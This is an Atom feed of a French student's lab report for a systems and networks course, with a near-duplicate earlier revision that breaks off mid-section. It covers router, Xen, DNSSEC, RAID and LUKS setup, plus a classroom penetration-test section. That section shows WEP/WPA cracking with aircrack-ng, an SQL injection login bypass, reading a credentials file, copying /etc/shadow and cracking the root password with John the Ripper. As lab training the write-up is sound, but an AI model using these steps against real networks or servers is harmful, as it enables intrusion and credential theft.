https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&feedformat=atom&user=AvercaemWiki d'activités IMA - Contributions de l’utilisateur [fr]2026-04-25T09:31:34ZContributions de l’utilisateurMediaWiki 1.29.2https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57941TP sysres IMA5 2021/2022 G72022-01-12T11:25:34Z<p>Avercaem : /* PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
== Architecture réseau ==<br />
<br />
export http_proxy=http://proxy.plil.fr:3128<br />
export https_proxy=https://proxy.plil.fr:3128<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 3600<br />
@ IN SOA (<br />
ns.anosteke.site.<br />
ns6.gandi.net.<br />
2;<br />
3600;<br />
3600;<br />
3600;<br />
3600;<br />
)<br />
<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME www<br />
<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
On ajoute à notre fichier named.conf.options les paramètres suivants : <br />
<br />
dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version<br />
dnssec-validation yes; //FOrcer le dnssec<br />
<br />
On génère ensuite nos clés, dans un fichier connus<br />
<br />
cd /etc/bind/master<br />
dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site <br />
//Kanosteke59.site.+007+15849<br />
dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site<br />
//Kanosteke59.site.+007+60636<br />
<br />
ici on crée une clé pour du SHA-1<br />
ON peut ensuite renommer les fichiers <br />
<br />
mv Kanosteke59.site.+007+60636.key Kanosteke59.site.ksk.key<br />
mv Kanosteke59.site.+007+60636.private Kanosteke59.site.ksk.private<br />
mv Kanosteke59.site.+007+15849.key Kanosteke59.site.zsk.key<br />
mv Kanosteke59.site.+007+15849.private Kanosteke59.site.zsk.private<br />
<br />
On ajoute dans la fin de définition du domaine :<br />
<br />
$TTL 3600<br />
<br />
...<br />
<br />
$INCLUDE Kanosteke59.site.zsk.key<br />
$INCLUDE Kanosteke59.site.ksk.key<br />
<br />
On signe maintenant nos fichier de définition<br />
dnssec-signzone -o anosteke59.site -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk<br />
<br />
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé<br />
zone "anosteke59.site" {<br />
type master;<br />
file "/etc/bind/master/anosteke59.site.signed";<br />
notify yes;<br />
};<br />
<br />
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
Pour démarrer, nous formatons la clé :<br />
mkfs.ext4 /dev/sdb<br />
<br />
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :<br />
cryptsetup luksFormat /dev/sdb<br />
<br />
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte <br />
cryptsetup luksOpen /dev/sdb crypte<br />
Puis nous le formatons<br />
mkfs.ext4 /dev/mapper/crypte <br />
<br />
Nous montons ensuite la partition afin d'y ajouter un fichier test :<br />
mkdir /mnt/cryptUSB<br />
mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/<br />
<br />
Nous créons ce fichier test.txt en y inscrivant "BONJOUR MONDE !" :<br />
nano /mnt/cryptUSB/test.txt<br />
<br />
Enfin, nous démontons et fermons le volume chiffré :<br />
umount /mnt/cryptUSB<br />
cryptsetup luksClose crypte<br />
<br />
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers<br />
<br />
== Tests d’intrusion ==<br />
<br />
=== WEP ===<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
=== WPA ===<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
=== Intrusion sur un serveur d’application Web ===<br />
<br />
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur "' or 1=1; --"<br />
<br />
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.<br />
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.<br/><br />
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.<br/><br />
<br />
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.<br/><br />
<br />
2. PHPMyAdmin<br />
<br />
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19<br />
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword <br />
<br />
3. Récupération de fichiers avec l'user rex<br />
<br />
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.<br/><br />
Nous avons lancé la commande :<br />
unshadow /etc/passwd /etc/shadow | head -1 > mdp<br />
Nous avons obtenu un fichier avec le mot de passe root haché.<br />
<br />
5. Decryptage du mot de passe root avec John the Ripper<br />
<br />
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : "mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel".<br/><br />
Nous avons créé un dictionnaire de mots de 4 lettres : <br />
crunch 4 4 abcdefghijklmnopqrstuvwxyz > dict<br />
<br />
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : <br />
sed -i 's/\(.*\)/\1\1/'<br />
La dernière étape consistait à lancer JtR :<br />
john -w:dict mdp<br />
Après 5 minutes d'attente, le mot de passe vu cracké.<br/><br />
Avec la commande : <br />
john --show mdp<br />
On obtient le mot de passe : '''fortfort'''.<br />
<br />
= ASR =<br />
<br />
xl create -c PRA-07.cfg<br />
<br />
xen console PRA-07<br />
<br />
on ajoute dans /etc/network/interfaces :<br />
iface eth0 inet static<br />
address 172.26.145.107/24<br />
gateway 172.26.145.254<br />
<br />
Et on commente relatif au DHCP<br />
on édite /etc/ssh/sshd_config :<br />
PermitRootLogin yes<br />
<br />
on copie la clé publique de la zabeth dans /root/.ssh/authorized_key<br />
<br />
on install puthon3-venv sur la zabeth :<br />
apt install python3-venv<br />
<br />
on install ansible sur les zabeth :<br />
python3 -m venv ~/env-ansible<br />
. ~/env-ansible/bin/activate<br />
pip3 install -U setuptools wheel<br />
pip3 install -U ansible<br />
<br />
On édite le fichier inventory de ansible :<br />
ASR-07 ansible_ssh_host="172.26.145.107"<br />
<br />
Passons maintenant à la configuration de ansible :<br />
<br />
On modifie la tache main.yml du role de base pour modifier la source de sécurité des paquets<br />
<br />
tache<br />
- name: "Fix BullsEye"<br />
copy: <br />
src: "{{ role_path }}/files/sources.list"<br />
dest: /etc/apt/<br />
<br />
sources.list<br />
deb http://deb.debian.org/debian bullseye main contrib non-free<br />
deb-src http://deb.debian.org/debian bullseye main contrib non-free<br />
deb http://security.debian.org/debian-security bullseye-security main contrib non-free</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57908TP sysres IMA5 2021/2022 G72022-01-12T10:32:15Z<p>Avercaem : /* ASR */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 3600<br />
@ IN SOA (<br />
ns.anosteke.site.<br />
ns6.gandi.net.<br />
2;<br />
3600;<br />
3600;<br />
3600;<br />
3600;<br />
)<br />
<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME www<br />
<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
On ajoute à notre fichier named.conf.options les paramètres suivants : <br />
<br />
dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version<br />
dnssec-validation yes; //FOrcer le dnssec<br />
<br />
On génère ensuite nos clés, dans un fichier connus<br />
<br />
cd /etc/bind/master<br />
dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site <br />
//Kanosteke59.site.+007+15849<br />
dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site<br />
//Kanosteke59.site.+007+60636<br />
<br />
ici on crée une clé pour du SHA-1<br />
ON peut ensuite renommer les fichiers <br />
<br />
mv Kanosteke59.site.+007+60636.key Kanosteke59.site.ksk.key<br />
mv Kanosteke59.site.+007+60636.private Kanosteke59.site.ksk.private<br />
mv Kanosteke59.site.+007+15849.key Kanosteke59.site.zsk.key<br />
mv Kanosteke59.site.+007+15849.private Kanosteke59.site.zsk.private<br />
<br />
On ajoute dans la fin de définition du domaine :<br />
<br />
$TTL 3600<br />
<br />
...<br />
<br />
$INCLUDE Kanosteke59.site.zsk.key<br />
$INCLUDE Kanosteke59.site.ksk.key<br />
<br />
On signe maintenant nos fichier de définition<br />
dnssec-signzone -o anosteke59.site -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk<br />
<br />
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé<br />
zone "anosteke59.site" {<br />
type master;<br />
file "/etc/bind/master/anosteke59.site.signed";<br />
notify yes;<br />
};<br />
<br />
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
Pour démarrer, nous formatons la clé :<br />
mkfs.ext4 /dev/sdb<br />
<br />
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :<br />
cryptsetup luksFormat /dev/sdb<br />
<br />
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte <br />
cryptsetup luksOpen /dev/sdb crypte<br />
Puis nous le formatons<br />
mkfs.ext4 /dev/mapper/crypte <br />
<br />
Nous montons ensuite la partition afin d'y ajouter un fichier test :<br />
mkdir /mnt/cryptUSB<br />
mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/<br />
<br />
Nous créons ce fichier test.txt en y inscrivant "BONJOUR MONDE !" :<br />
nano /mnt/cryptUSB/test.txt<br />
<br />
Enfin, nous démontons et fermons le volume chiffré :<br />
umount /mnt/cryptUSB<br />
cryptsetup luksClose crypte<br />
<br />
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers<br />
<br />
== Tests d’intrusion ==<br />
<br />
=== WEP ===<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
=== WPA ===<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
=== Intrusion sur un serveur d’application Web ===<br />
<br />
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur "' or 1=1; --"<br />
<br />
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.<br />
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.<br/><br />
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.<br/><br />
<br />
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.<br/><br />
<br />
2. PHPMyAdmin<br />
<br />
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19<br />
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword <br />
<br />
3. Récupération de fichiers avec l'user rex<br />
<br />
